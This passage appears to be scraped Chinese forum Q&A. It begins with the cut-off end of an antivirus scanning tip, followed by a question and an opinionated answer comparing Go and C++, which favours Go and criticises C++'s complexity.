kav5,与版本有关),然后输入KAVDX,回车就开始杀毒了。
有人学过GO语言么?和C++比、优缺点在那?
C++适合本地程序的开发。Go语言适合网络程序和本地程序的开发。Go的优点:垃圾回收,语意明确,格式统一。 Go的缺点:效率目前没有C++高,但对于桌面程序而言,效率问题不大,因为硬件已经很快了。c++过于复杂了,加入很多炫技的内容。这些内容脱离了事情的本质。
最明显的就是所谓的面向对象。基于面向对象的工程如果足够大的情况下,会带来很大的耦合度,如果再加上内存管理,多线程等等。项目后期基本上没办法维护和增加功能。
关于c++的语言复杂性,你可以问知乎上的任何一位高手。没一个敢说自己精通c++。你也可以去看一下所有的c++编绎器,没有任何一个敢说自己完全实现了c++的标准。不同的编绎器之间实现细节又不同。所以功能再强大没有实用性,就失去了意义,只会制造更多的问题。